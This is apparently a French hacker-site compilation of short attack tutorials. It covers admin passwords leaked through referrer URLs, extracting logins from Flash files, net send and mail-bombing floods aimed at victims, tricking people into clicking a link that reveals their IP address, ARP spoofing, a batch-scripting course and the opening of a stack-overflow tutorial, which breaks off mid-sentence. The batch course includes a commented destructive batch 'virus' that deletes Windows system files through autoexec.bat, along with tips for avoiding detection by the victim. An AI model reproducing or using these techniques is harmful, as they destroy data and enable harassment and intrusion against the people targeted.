forme :
http://www.google.com/search?q=moteur recherche
email&hl=fr&lr=&ie=UTF-8&oe=UTF-8&start=20&sa=N
Nous remarquons la variable "q" nous donne les mots clefs... Mais
beaucoup de script PHP vous permet de vérifier un site ( par exemple soumis dans
un annuaire généraliste lamba ) via l'interface d'admin.
C'est le cas de
PDS qui propose un lien avant d'accepter un nouveau site dans le partenariat.
Cependant le développeur de ce script fait passer le mot de passe et le login à
travers URL.
Donc la variable $REFERER prend la valeur du type : http://www.victim.com/pds/index.php?login=admin&mdp=234223
Donc au moment où vous cliquez pour vérifier la qualité d'un site, le
$REFERER contient cette URL qui avec un simple copier collée vous permet
d'accepter sur l'espace d'administration de la personne.
Encore plus
grave: dans ce même script, PDS prévoit une page dans lesquelles vous rentrez
vos paramètres SQL avec le mot de passe en claire !
Il y a donc tout ce
qu'il faut pour une intrusion dans la base de données dans laquelle se trouve
souvent les informations très intéressantes...
Le mot de passe SQL est
souvent le même que le mot de passe FTP donc inutile de vous dire l'énormité de
cette faille...
Voilà : Attention à vos scripts
Clin d’œil sur le site http://www.webdiz.com/scriptsphp/pdsban.php qui propose PDS
avec la phrase : « avec un interphase très evoluer »
Le site http://plus2trafic.membres.jexiste.org/pds-ban/ qui à tester
ce script à laisser tout sans l’utiliser ! grosse erreur !!!!
Infos sur
PDS sur http://plus2trafic.membres.jexiste.org/pds-ban/Lisez-moi.html
Salutation...
Comment passer les protections flash
Pour cela vous
avez besoin: - Une protection flash (logique) - Le logiciel Sothink SWF
Decompileur. - Mon tuto - Un cerveau (et encore, c'est
facultatif) Recette: Une fois que vous étes dans la page où se trouve la
protection flash, allez chercher dans le code source de la page, l'URL
correspondant à cette protection, elle est de la forme: machintruc.swf Une
fois cela fait, chargez la page puis faites enregistrer sous ! Maintenant
ouvrez le fichier ainsi sauvegardé avec le logiciel Sothink SWF
Decompileur. Cochez la case Source Code (dans View puis ActionScript). A
partir de là il ne vous reste plus qu'à explorer les sous dossiers de la
protection flash (ça se trouve sur la droite). Le login et le pass se trouvent
dans le code source (dans le sous dossier action). C'est aussi simple que
ça.
Faire planter un ordi avec Netsend
En déconnant
avec Snurf, alors qu'on s'envoyait des messages avec NetSend (voir l'article net
send, toujours dans la rubrique hacking); je me suis dit si c'était pas possible
d'automatiser l'envoi de message, de les envoyer en nombre et pourquoi pas,
faire planter l'ordi!!! Oui, je viens d'inventer la technique pour envoyer
automatiquement des messages. REDOUTABLE!!!
Vous avez bien lu et la
technique, toute conne, est en exclusivité sur projectnews (mais pour combien de
temps avec tous les copiers colleur et les pompeurs d'idées qui courent sur le
net!!!).
Voici la technique pas à pas, je précise qu'il faut win2000 ou
XP pour que ça marche, de même pour l'ordinateur cible!
On va créer un
petit programme en .bat tout con qui se chargera d'expédier les message dès que
vous cliquerez dessus. Voici la procédure:
1)Ouvrer le bloc
note
2)Tapez la ligne suivante:
net send 81.52.234.58 salut tout
le monde!!!
(mettez l'ip de l'ordinateur a attaqué a la place de
81.52.234.58 et le message que vous voulez a la place de salut tout le monde!!!
)
3) sautez une ligne et mettez la même phrase en faisant copier
coller
mettez autant de phrase que de message a envoyer
4)
maitenant va falloir enregistrer votre chef d'oeuvre,
-allez dans
enregistrer sous
-choisissez type de fichier-tous les
fichiers
-nom du fichier send.bat
Voilà c'était pas bien compliqué
et c'est rudement efficace.
Net send, ou comment bien se marrer avec l'ip de quelqu'un
Net send, c'est une commande très vieille que les publicitaires ont
récupérés pour vous envoyer des message. Cependant, en connaissant l'ip de
quelqu'un (voir les autres articles sur ce sujet sur projectnews) vous pouvez
vous aussi lui envoyer des messages d'alertes windows. Sympa non? Voici comment
faire: Compatible uniquement avec windows 2000 et Xp
1)aller dans
démarer, accessoire et choisissez invite de commande 2)tapez ipconfig sous xp
ou winipcfg sous les autres windows pour connaitre votre ip. 3)une fois que
vous la connaissez, tapez "net send 127.0.0.1 ici le message" Remplacez bien
sur 127.0.0.1 par votre ip. Vous verrez ensuite apparaitre un message sur votre
ordi. Pour envoyez un message a une connaissance, mettez l'ip de la personne,
elle recevra votre message, a condition qu'elle n'est pas de pare feu. En
effet, les pare feu bloque ces messages. Donc quand vous vous envoyez un
message a vous même, n'oubliez pas de l'éteindre.
Voici le screenshot de
la méthode:
Mail-bombing Le mail-bombing est une technique toute
conne qui sert à faire chier le monde. C'est ce que les jeunes hacker font en
premier. Il s'agit d'un logiciel qui envoie des milliers de messages pour faire
planter la boite.( En général 5000 suffit). On utilise pour cela des logiciels
qui se chargeront d'effectuer les opérations demander.
Commencer par
télécharger le logiciels et installer-le ( j'en propose dans la rubrique
téléchargement). Si votre antivirus s'excite, c'est normal, ça veut dire qu'il
marche bien. Ils sont conçu pour detecter ce genre de programme. Rassurez-vous
c'est sans danger.
Entrer l'adresse de votre corespondant, écrivez un
message, choisissez le nombre de message à envoyer, entrer le nom d'un serveur
qui se chargera d'acheminer le courrier( par exemple smtp.free.fr) et envoyer la
sauce!!!.
Qu'est-ce que c'est ?
Le Mail Bonbing constite à
envoyer un nombre faramineux d'emails (plusieurs milliers par exemple) à un ou
des destinataires. L'objectif étant de :
-saturer le serveur de mails
_saturer la bande passante du serveur et du ou des destinataires, rendre
impossible aux destinataires de continuer à utiliser l'adresse
électronique.
Conclusion
Le mail bombing n'est, à priori, pas
illégal. Il n'existe pas de limite légale déterminant le nombre maximum de
messages à envoyer à un internaute. Cependant, les fournisseurs d'accès à
Internet n'apprécient pas ce type de procédés. En effet, cela leur cause des
soucis de bande passante et la saturation de leurs serveurs de messagerie. En
conséquence, n'hésitez surtout pas à les solliciter si vous êtes victime d'une
telle attaque. Ils réagissent généralement rapidement pour éviter que leurs
abonnés recommencent.
Adresse ip: 2 autres techniques pour en choper une
Les adresse ip , nuxly et les autres on en dejà beaucoup parlait sur le site ,
certaines technique pour avoir l'ip sont donc dejà a voir mais moi j'en ais une
autre !
Ma "technique" c'est en faite un logiciel ...
Le nom de ce programmes : serv-U , c'est un serveur ftp qui se sert de votre
pc comme d'un passerelle ftp , mais vous ne l'utiliserais que comme vous le
voulez ... ne laisser pas tous les hackeur du web se connecter dessus mais en
principe y'a pas trop de danger ... Bon j'arrete de divaguer ... Alors vous
telecharger serv-u ! Je ne connais plus l'url et c'est une seule de toutes les
version serv'u qu'il faut ! je crois que c'est la 5.0.1 .... pas d'autre
informaton sauf que ce serv-u la a une forme rectangulaire et ne vous demande
aucune information precise !! ( si vous le trouver donner l'url sur un forum svp
). Bon revenons !!! Vous lancer serv-u et vous aller parler a la cible .. vous
lui envoyer un mail .. lui dites des choses cochonne sur MSN ... je m'en fou
mais vous lui envoyer un lien avec l'url : ftp://votreipici , surtout n'oubliern
pas de mettre votre ip !! Pour ceux qui ne savent pas faire un lien ...Chercher
nan je lol !! clique droit : hyperlien en principe !!! Bon ensuite vous aller
dans serv-u et si la personne clique effetivement sur le lien , dans serv-u cela
s'affichera ! vous verrer son serveur ( wanadoo , aol ... ) ainsi que son ip !!!
Pas copliquer non ? EN RESUMER : pour ce qu'il ne veulent pas tout lire vous
telecharger serv-U 5.0.1 ou 5.1.0 .... fin un serv-u de forme rectangulaire !
vous envoyer un lien a votre victime avec l'url : ftp://votreipavous et vous
verrer apparaitre son ip dans serv-u a condition que la victime clique sur le
lien !! PS: attention ne vous attaquer pas a des boss ou quoi parce ke quand la
victime cliquera sur le lien , dans la barre d'url elle vera votre ip ,
quelqu'un de naif se demandera : " quoi? une page blanche?" mai un hackeur sera
quoi faire de ces numeros !!! FIN DU ROMANS On peut faire la même chose avec zone alarm, on met son ip, le pigeon clique
dessus, il essaye de se conecter a ta bécanne mais zone alarm s'exite et affiche
l'ip de celui qui veut s'introduire dans le pc. Voilà, c'est tout con et je
pense que c'est un peu plus simple que l'autre technique, cependant serv-u est
un excellent logiciel si vous voulez créer un serveur sur votre PC.
Les
attaques: l'arp redirect
Les attaques : L’arp redirect
L'attaque ARP redirect vise les réseaux locaux ethernet, qu'ils soient
partitionnés ou non en sous-réseaux (switchés). C'est une technique de spoofing
efficace bien que détectable dans les logs
d'administration; elle consiste à s'attribuer l'adresse IP de la machine cible, c'est-à-dire à
faire correspondre son adresse IP à l'adresse MAC de la machine pirate dans les
tables ARP des machines du réseau. Pour cela il suffit en fait d'envoyer
régulièrement des paquets ARP_reply en broadcast, contenant l'adresse IP cible
et la fausse adresse MAC. Cela a pour effet de modifier les tables dynamiques de
toutes les machines du réseau. Celles-ci enverront donc leur trames ethernet à
la machine pirate tout en croyant communiquer avec la cible, et ce de façon
transparente pour les switches. De son côté, la machine pirate stocke le traffic
et le renvoie à la vraie machine en forgeant des trames ethernet comportant la
vraie adresse MAC (indépendamment de l'adresse IP). Cette technique est très
puissante puisqu'elle opère au niveau ethernet, permettant ainsi de spoofer le
trafic IP et même TCP (cela dépend entre autres des délais engendrés par la
machine pirate). D'autre part, elle permet de contourner les barrières que
constituent habituellement les switches (partitionnement de réseaux).
Quel outil : http://www.arp-sk.org/
A besoin de wincap pour fonctionner http://winpcap.polito.it/install/default.htm
Tutorial sur les .batch (.bat)
Bonjour, dans ce tutorial je
présenterais le batch et des exemples de code en batch, à la fin se trouve des
liens avec un compilateur et des cours, bonne lecture.
Table des
matières
1: Initiation et explication
du batch, et liste de différentes commandes
2: Initiation à la boucle IF
3: Code viral en
batch
3: Graphisme en
batch
5: Divers liens
1: Explication, initiations,
et liste des commandes
Le batch fonctionne uniquement
sous Windows (toutes versions) mais nous noterons tout de même qu'il y a des
fonctions comme les couleurs, propres aux systèmes à base NT (donc NT, XP et
2000)
Déjà il faut dire que le batch
n’est rien de plus qu’une série de commandes Ms-Dos, donc toutes les commandes
Ms-Dos que vous connaissez peuvent être utilisées, nous noterons également,
qu'il y a des commandes propres au .batch (hors commandes Ms-Dos) près
enregistrées dans un fichier, qui des que vous ouvrirais le fichier, seront
exécutées une à une.
On peut également, faire des
boucles, mais très basiques (c'est pas du C/C quand même hein ! ;) genre, if,
for... qui seront abordées dans ce cour
Pour faire un .bat écrivez
votre texte dans le bloc note puis sauvez avec l'extension .bat ou .batch ou
utilisez un compilo (comme Power Batch).
Commençons par une notion
simple, l’echo.
L’echo peut servir à plusieurs
trucs, comme:
Echo « texte »
affiche du
texte
Echo off affiche que les résultats des
commandes MS-Dos et non les commandes elles même
@echo off pareil que echo off sauf que
la commande echo off est caché elle-même car dans le batch, les commandes sont
lut puis une fois lut, exécuter (donc echo off sera affiché avant d’être
exécuté, donc ne se cachera pas lui-même) donc un simple echo off cachera toutes
les commandes sauf lui alors qu’avez le signe @ il se cachera
lui-même.
Echo. Affiche une ligne vide (saute
une ligne)
Voilà pour l’echo, nous
passons à une notion un peu plus compliquée (même si le batch est très simple il
y a forcement des choses plus durs que d’autres ;)
Pour mettre de la couleur dans
votre batch, (uniquement Windows NT ) il va falloir mettre une « choses » qui
vérifie si l’OS est à base NT et exécute ensuite la commande qui change la
couleur de fond et des textes dans la fenêtre MS-Dos.
Voici cet
IF:
if
not "%os%" =="Windows_NT" goto OSerr
color 0A
Le if not "%os%"
=="Windows_NT" goto OSerr testera si l’os est NT, et le color 0A veut
dire mettre le fond de la fenêtre en noir et les écritures en vert,
explication:
La première valeur définit la couleur de fond du MS-Dos,
ici 0 = noir
La deuxième valeur définit la
couleur du texte, ici A = vert
Liste avec quelques couleurs
: 0
= noir 1 = bleu foncé 2 = vert
3 = bleu gris 4 = marron etc…
Pour rejoindre un répertoire,
rien de plus simple tapez le légendaire:
cd C: om du
répertoire
Imaginez que vous voulez créer
un répertoire dans C:program files
(Sachant que la commande pour
créer un répertoire est mkdir)
Vous
taperez:
cd C:Program
files
mkdir nom-du-répertoire
Ensuite libre cour à votre
imagination le batch n’est jamais qu’une série
de commandes Ms-Dos près
enregistré dans un fichier, donc vous pouvez mettre un ipconfig et double
cliquer pour voir votre ip…
Pour que votre batch ne se
ferme pas instantanément il va falloir mettre un truc, mais quoi ? Tout
simplement pause à la fin de votre code, le programme attendra
ensuite que vous appuyez sur une touche pour se fermer.
Puis voici la liste avec
quelques commandes Ms-Dos (par m@ster@ck)
del fichier : cette commande
permet de supprimer un fichier.
deltree fichier : supprime un
dossier complet.
move fichier : déplace le
fichier "fichier".
echo off : désactive
l'affichage de ce qui ce passe.
dir c:WINDOWS : affiche le
contenu de c:windows.
echo. : saute une ligne.
echo ce que tu veux écrire :
écrit ce que vous tapez après echo (dans notre cas il y aura écrit "ce que tu
veux écrire").
CLS : efface l'écran.
PAUSE : demande d'appuyer sur
une touche pour continuer
C:WINDOWS ON_PROG.EXE: exécute
ton_prog.exe
AT: Planifie l'exécution de
commande ou programmes sur l'ordinateur
ATTRIB: Affiche ou modifie les
attributs d'un fichier
BREAK : Active ou désactive le
contrôle étendu de CTRL C
CALLS: Affiche ou modifie les
listes de contrôles d'accès aux fichiers.
CALL: appelle un fichier de
commande depuis un autre fichier de commande
CD: Modifie le répertoire ou
affiche le répertoire en cours
CHCP: Modifie la page de code
active ou affiche son numéro.
CHDIR: Modifie le répertoire
ou affiche le nom du répertoire en cours
CHKDSK: Vérifie un disque et
affiche un relevé d'état
CHKNTFS: Affiche ou modifie la
vérification du disque au démarrage
CMD : Lance une nouvelle
instance de l'interprétateur de commande de Windows
COLOR: Modifie les couleurs du
premier plan et de l'arrière plan de la console
COMP : Compare les contenus de
deux fichiers ou groupe de fichiers
COMPACT : Modifie ou affiche
la compression des fichiers sur une partition NTFS
CONVERT : Convertit des
volumes FAT en volumes NTFS. Vous ne pouvez pas convertir le lecteur en cours
d'utilisation.
COPY : Copie un ou plusieurs
fichiers.
DATE : Affiche ou modifie la
date.
DIR : Liste des
fichiers
DISKOMP: Compare les contenus
de deux disquettes
DISKCOPY : Copie le contenus
d'une disquette sur une autre
ENDLOCAL : Stoppe la
localisation des modifications de l'environnement dans un fichier de commandes
ERASE : Supprime un ou
plusieurs fichiers.
EXIT : Quitte l'interprétateur
de commandes .
FC : Compare deux fichiers ou
groupe de fichiers ;et affiche les différences entre eux .
FIND : Cherche une chaîne de
caractères dans un ou plusieurs fichiers
FINDSTR : Cherche des chaînes
de caractères dans un ou plusieurs fichiers
FOR : Exécute une commande sur
chaque fichier d'un groupe de fichiers
FORMAT : Formate un disque
pour utilisation avec Windows
FTYPE : Affiche ou modifie les
types de fichiers utilisés dans les associations d’extensions
GOTO : Poursuit l'exécution
d'un fichier de commandes à une ligne identifiée par une étiquette
GRAFTABL : Permet à Windows
d'afficher un jeu de caractères en mode graphique
HELP : Affiche des
informations sur les commandes de Windows
IF : Effectue un traitement
conditionnel dans un fichier de commande
LABEL : Crée, modifié ou
supprime le nom de volume d'un disque
MD : Crée un répertoire
MODE : Configure un
périphérique du système
MORE : Affiche la sortie écran
par écran
MOVE : Déplace un ou plusieurs
fichiers d'un répertoire à un autre
PATH : Affiche ou définit le
chemin de recherche des fichiers exécutables
POPD : Restaure la valeur
précédente du répertoire courant enregistré par PUSHD
PRINT : Imprime un fichier
texte
PROMPT : Modifie l'invite de
commande de Windows
PUSHD : Enregistre le
répertoire courant puis le modifie
RD : Supprime un répertoire
RECOVER : Récupère
l'information lisible d'un disque défectueux
REM : Insère un commentaire
dans un fichier de commandes ou CONFIG.SYS.
REN : Renomme un ou plusieurs
fichiers
SET : Affiche, définit ou
supprime des variables d'environnement Windows
SETLOCAL : Commence la
localisation des changements de l'environnement dans un fichier de commandes
SHIFT : Modifie la position
des paramètres remplaçables dans un fichier de commandes
SORT : Trie les éléments en
entrée
SUBST : Affecte une lettre de
lecteur à un chemin d'accès
Et nous finissons par un
exemple de code en batch, bonne fin de lecture..
Pour compiler le programme
suivant, mettez le dans le bloc note et sauvez le avec une extension .bat ou
alors dans Power batch.
Code pour Win
XP:
@Echo
OFF
TITLE
Bienvenue sur Connexions Power...
if
not "%os%" =="Windows_NT" goto OSerr
color
0A
ECHO
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ECHO º Connexions Power º Donne
votre IP et liste les connexions de votre PC
ECHO
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ECHO.
ECHO.
ipconfig
ECHO.
ECHO
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ECHO.
netstat
ECHO.
ECHO
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ECHO.
ECHO Connexions Power garde
des fichiers log des activités‚es et de vos Ips
ECHO
C:Program FilesConnexions-Power.
ECHO.
cd
C:Program Files
mkdir
Connexions-Power
cd C:Program
FilesConnexions-Power
ipconfig >>
Ips.txt
netstat >>
Connexions.txt
PAUSE
Alors, maintenant, on va
commenter ce code ;)
C’est un batch qui, des que
vous cliquerais dessus, vous donnera votre IP et vous montrera les connexions de
votre PC (j’ai pris cet exemple car je me sers souvent de ces
commandes)
TITLE donne un titre à la fenêtre
Ms-Dos (en haut à gauche)
@ECHO off
Veut dire: cacher tout le
texte (les commandes entrées etc… et n’afficher que le résultat) le Echo off
cache tout, sauf lui-même et le @ cache Echo off (vous comprenez
?)
if
not "%os%" =="Windows_NT" goto Oserr
color 0A
Veut dire, que si l’OS est à
base NT, le fond de la fenêtre ms-dos, sera noir et les écritures,
vertes.
ECHO
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ECHO º Connexions Power º Donne
votre IP et liste les connexions de votre PC
ECHO
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Affiche un cadre autour de
Connexions Power et marque « Donne votre IP et liste les connexions de votre PC
» à droite du cadre.
ECHO.
Veut dire, sauter une
ligne
Ensuite, ipconfig et affiche
votre IP et netstat affiche vos connexions.
cd
C:Program Files
mkdir
Connexions-Power
cd C:Program
FilesConnexions-Power
Veut dire: aller dans le
répertoire program files, créer un fichier Connexions Power, puis allez dans ce
dossier et attendre les instructions.
ipconfig >>
Ips.txt
netstat >>
Connexions.txt
Veut dire, à chaque ouverture,
loguer les instructions affichées par ces deux commandes les mettre dans un .txt
et mettre ce .txt dans le dossier Power-Connexions que l’on vient de
créer.
Pause
Veut dire attendre que
l’utilisateur tape sur une touche et quitter le programme.
Voilà, j’espère que ce petit
code commenté vous aura servit et vous
aura apprit quelques choses, j’attends vos commentaires
2: Initiation à la boucle IF
Dans cette partie, je vais
essayer de vous faire une petite initiation au boucle IF et FOR dans les batch
(j’estime qu’il n’y a plus besoin de code source, pour vous faire des exemples,
si vous avez lut la première partie vous avez un minimum
d’autonomie)
IF
Cette commande sert à une chose bien utile: si
une condition est remplie (comme par exemple, imaginons le programme de la
section précédente, nous allons dire que si votre IP est celle si: 212.35.25.48
il se produira une chose, si elle n’est pas celle ci, l’instruction sensée
s’exécuter ne s’exécute pas (bien sur, mon exemple est un mauvais exemple car il
ne sert à rien dans un programme d’exécute un programme si votre IP est celle
ci, quoi que si vous avez une IP et si vous voulez voir si elle a changé
;)
Voici sa syntaxe: If «
condition » == « valeur » action
Nous allons prendre comme
exemple encore mon code précédent:
if
not "%os%" =="Windows_NT" goto OSerr
color
0A
Vous voyez que si l’OS est à
base NT, la commande color 0A sera exécutées, on la passe, voilà c’est
aussi simple que ça ;)
3: Code viral en
batch
Exemple commenté d’un virus en .bat
:
@echo off //désactive l’affichage à
l’ecran del c :windows*.dll // del des
DLLs del c :windowssystem*.dll //del des DLLs del c :windows*.exe //del des EXEs del c :windows*.ini //del INI del c :windows*.sys //destruction des fichiers vitaux echo @echo
off>>c :autoexec.bat //écriture dans autoexec del c
:windows*.dll>>c :autoexec.bat //del
des DLLs en cour d'utilisation (et donc protégées, il faut les enlevées au
démarrage) del c :windowssystem*.dll>>c :autoexec.bat //destruction des fichiers protégés au
démarrage del c:windowsexplorer.exe>>c :autoexec.bat //del de l'explorer
Astuce : Pour les virus nécessitant un redémarrage de la
machine pour une destruction totale, rajoutez la commande C:WINDOWSRUNDLL32.EXE
user.exe,exitwindows à la fin pour l’arrêt de la machine. / ! Attention
! Avant d’utiliser un batch sur une personne, il est conseillé de faire un
repérage pour identifier le système. Imaginez que le répertoire du gars
s’appelle « windows01 », le virus ne pourra pas y accéder, et là : message d
‘erreur et vous êtes démasqué ! Ces virus ne marche que sous windows ! Des
petites astuces existent : remplacer windows par %systemdir%
(J'ai récupéré ce tuto il
n'est pas de moi, mais je l'ai trouvé bien (il se sert de autoexec etc... pour
infos, son auteur était Shad0w)
3: Graphisme en
batch
Vous allez rire, vous allez me
dire qu’une fenêtre Ms-Dos ont ne peut pas lui rajouter des
graphismes….
Ok, ce ne sera pas une
interface graphique, mais des couleurs, des encadrement, et tout ce qui va avec
;)
Sachez que les couleurs sont
disponibles uniquement sous Windows NT, XP et 2000.
Il vous faudra rentrer une
instruction IF vu précédemment, là voici:
if
not "%os%" =="Windows_NT" goto OSerr
color
0A
Mettez cette commande tout au
début de votre batch, car vu que les commandes sont exécutées une à une, si vous
la mettez à la fin, la fenêtre ne sera pas coloré des qu’elle sera ouverte
(testez pour voir)
Si vous copiez cette commande,
le fond sera en noir et les couleurs, en vert, vu que j’ai déjà parlé un peu
parler du graphisme en chapitre 1, je vais donner ici uniquement une liste des
différentes couleurs:
0 = Noir
1 = Bleu
foncé
2 = Vert
3 = Bleu
gris
4 =
Marron
5 =
Pourpre
6 = Kaki
7 = Gris
clair
8 = Gris
9 = Bleu
clair
A = vert
clair
B =
Cyan
C =
Rouge
D = Rose
E =
Jaune
F =
blanc
Voilà pour cette liste, on
passe maintenant aux encadrements j’ai promis en début de de tuto, que j’en
reparlerais ;)
On peut encadrer son texte
dans un batch, il faut pour cela afficher du texte (donc echo) et rentrer une
série de caractères spéciaux interprétés par Ms-Dos comme des bordures regardez
:
ECHO
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ECHO º Connexions Power º
ECHO
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
En regardant bien on en déduit
qu’une bordure horizontale n’est qu’une série de Í, je vais détailler ici
quel symbole symbolise quelle bordures:
Í = bordure
horizontale
º = bordure verticale
É = coin supérieur
gauche
È = coin inférieur
gauche
» = coin supérieur
droit
¼ = coin inférieur
droit
En ayant cette légende et en
testant (et en vous rapportant au batch de début de tuto) les bordures
paraissent et sont simples ;)
Liens
Voici la section des liens, il
y a des liens pour télécharger des compilo et d'autres pour des tuto sur le
batch beaucoup plus complexe et complet que le mien (je vous suggère de lire ces
90 pages de tuto, si vous avez amé le mien, car le mien n'était fait que pour
avoir une ou deux notions)
www.astase.com (site de
programmation)
www.astase.com/products/powerbatch/toolkit.htm
(power batch version pro)
www.astase.com/products/powerbatch/powerbatch.htm
(l'outils que j'utilise)
www.astase.com/products/powerbatch/powerbatchdos.htm
(la version allégées de powerbatch)
www.astase.com/products/powerbatch/tutorielbatch.htm
(le fameux tuto que je vous conseil de lire, j'ai tout appris
dedans)
Réinitialisé le mot de passe du bios
Il vous suffit d'enlever la pile de la carte mère, de démarrer
l'ordinateur, et de la remettre.
En effet, toutes les données qui ont été configurées dans le Bios sont
mémorisées dans la mémoire, qui a besoin d'énergie pour conserver les
données.
Par le simple fait d'enlever la pile de la carte mère et de démarrer
l'ordinateur (la pile est sur la carte mère, dans l'ordinateur, c'est
généralement la carte la plus grosse et la pile est ronde et plate, placée sur
la carte), cela efface toute la configuration, donc le mot de
passe.
Le Bios aura la configuration par défaut mais vous aurez toujours vos
données windows (donc rien de grave, car la plupart des bios ne sont jamais
configurés par l'utilisateur...).
Analyse et exploitation des débordement de pile
Stack Overflows Analysis & Exploiting Ways
Dans le passage qui suit, Vous allez comprendre le STACK overflows, cela sert
à apprendre comment le processeur travail pendant l’exécution du programme.
Quand un programme est exécuté ses éléments sont assignés dans la mémoire d'une
manière bien organisée comme le montre la figure. Des variables locales, les
arguments de fonction et pleins d'autres choses, sont assignés EN PILE. Les
variables assignées automatiques restent à la place dans le TAS. Des secteurs de
BSS et de DATA sont consacrés aux variables locales et sont assignés pendant le
temps de compilation
Pour être clair : les BSS de est secteur inclut par l’initialisation des
données, alors que le DATA est réservé pour des données statiques (e.g. ‘static’
dans le langage C). Le secteur de TEXT est le secteur de données comprenant les
instructions, telles que le code du programme qui est exécuté où il n'est
possible de ne réaliser d' opération d'écriture mais seulement de lecture.
Figure 1
______________________ | env
strings | high adresses |_____________________| | argv strings
| |_____________________| | env pointers | |_____________________| |
argv pointers | |_____________________| | arcg
| |_____________________| | stack | | || | | / | | | | / |
| || | | heap | |_____________________| | .bss
| |_____________________| | .data | |_____________________| | .text
| |_____________________| low address
Stack & SimpleSem
Une manière très bonne de comprendre ce qui se produit dans la PILE pendant
n'importe quelle exécution du programme est SIMPLESEM qui est une machine
virtuelle où il est possible d'exécuter un certain code dans le modèle
abstrait.
La PILE est une zone de mémoire où sont assignés les arguments de toutes les
fonctions, les variables locales et beaucoup d'information pour récupérer l'état
de mémoire avant que la fonction se soit appelée. Elle est organisée selon les
règles du LIFO (dernier dedans, d'abord dehors) et se développe vers le bas.
Analysons un programme C qui appelle quelques fonctions :
#include
void first(); void second();
main(int
argc, char *argv[]) { char a[10]; first(); } void
first() { char b[10]; second(); } void second() { char
c[10]; }
De cette façon toutes les variables vont être assignées EN PILE.
Étudions la situation démontant le code binaire : disas (de gdb)
principaux
Dump of assembler code for function main: 0x80482f4 : push ëp 0x80482f5
: mov %esp,ëp 0x80482f7 : sub !N_texte!x18,%esp 0x80482fa : and
!N_texte!xfffffff0,%esp 0x80482fd : mov !N_texte!x0,êx 0x8048302 : sub
êx,%esp 0x8048304 : call 0x804830c 0x8048309 : leave 0x804830a :
ret 0x804830b : nop
(gdb) disas first Dump of assembler code for
function first: 0x804830c : push ëp 0x804830d : mov %esp,ëp 0x804830f :
sub !N_texte!x18,%esp 0x8048312 : call 0x804831a 0x8048317 :
leave 0x8048318 : ret 0x8048319 : nop
(gdb) disas second Dump of
assembler code for function second: 0x804831a : push ëp 0x804831b : mov
%esp,ëp 0x804831d : sub !N_texte!x18,%esp 0x8048320 : leave 0x8048321 :
ret 0x8048322 : nop 0x8048323 : nop
Regardant les instructions assembleur ci-dessus il est possible de noter
comment l'appel de la routine est réalisé et son prolog relatif trop ("prolog de
procédé"), comme il suit :
• 0x804830c : push ëp (mis l'adresse de base dans la pile)
• 0x804830d : mov %esp,ëp (l'indicateur de pile courant devient la nouvelle
adresse de base)
• 0x804830f : sub !N_texte!x18,%esp (assignant l'espace pour la variable)
(afin de comprendre tous les concepts il est important une connaissance mineure
d'assembleur).
Il est fondamental pour maintenir la discussion aussi facile que possible,
ainsi nous pouvons négliger tous les calculs de "redundants" de la machine
(indispensable laissez-la fonctionnant bien) et présenter SIMPLESEM. Dans la
table suivante a été inséré le secteur de données du SIMPLESEM pendant
l'exécution du programme C de précédent.
SIMPLESEM CURRENT # 0 FREE # 1 Return Pointer # 2 Dynamic
Link # 3 A[10] in main() 4 Return Pointer # 5 Dynamic Link 2 6 B[10]
in first() 7 Return Pointer # 8 Dynamic Link 5 9 C[10] in second()
10
Les indicateurs COURANTS (indiquant l'adresse de base courante) et LIBREMENT
(indiquant la première cellule libre) sont nécessaires laissent le travail à la
machine mais pas aussi important pour comprendre comment l'appel d'une routine
fonctionne, alors nous peuvent les omettre. Il est possible de soustraire
l'appel de la routine s'insérant simplement dans le secteur de données :
• Return Pointer • Dynamic Link
Quand la routine reviendra aux visiteurs l'indicateur d'Istruction (IP) se
dirigera, dans le secteur de données, au prochain istruction.
Le maintenir en fait facile mais aussi vrai comme possible nous pouvons
placer près du secteur de données du SIMPLESEM le vrai processeur un. Il est
vraiment important de maintenir dans l'esprit qu'EN PARTICULIER le registre
dirigera toujours au dessus de la pile, il peut increase/decrease par push/pop ;
le lien dynamique de la routine appelée contient la valeur des adresses de base
de visiteur (Regard à la table ci-dessus). L'indicateur de retour, ou l'adresse
de retour, est poussé en temps-d'exécution dans la pile quand la fonction `CALL'
est appelée.
SIMPLESEM X86 CURRENT # FREE # Return Pointer # Dynamic Link
:push ëp A[10] in main() sub !N_texte!x18,%esp Return Pointer #
:call 0x804830c Dynamic Link :push ëp B[10] in
first() :sub !N_texte!x18,%esp Return Pointer # :call
0x804831a Dynamic Link : push ëp C[10] in second()
: sub !N_texte!x18,%esp
Overflow
En conclusion, après cette discussion, nous pouvons faire face au
"DÉBORDEMENT"(OVERFLOW) que notre problème est pour comprendre ce qui se
produit dans la PILE quand un débordement se produit. Nous pourrions noter que
quand nous déclarons une variable, son espace relatif est
assigné EN PILE :
A[10] in main() sub !N_texte!x18,%esp
Le débordement se produit quand nous allons au-dessus de la limite supérieure
réservée pour la variable en pile. Par le débordement de pile il est possible de
recouvrir le lien dynamique (EBP) et l'indicateur de retour trop (EIP) changeant
le temps d'exécution la prochaine instruction d'être exécuté quand la routine
revient.
Le programme suivant montre la vulnérabilité.
//VULNERABLE.C #include
main(int argc, char
*argv[]) { char a[100]; strcpy(a, argv[1]); }
Nous pouvons passer comme argv[1 ] n'importe quelle chaine plus longtemps que
100 chars.
Commencer le programme : Perl vulnérable de ` - le programme de
x128'` du l''impression "A" de e a reçu le signal SIGSEGV, défaut de
segmentation.
(gdb) 0x41414141 in ?? () (gdb) info reg eip eip 0x41414141
0x41414141 (gdb) info reg ebp ebp 0x41414141 0x41414141
Comme vous pouvez voir l'ee pourrait recouvrir EBP et EIP qui se dirigent
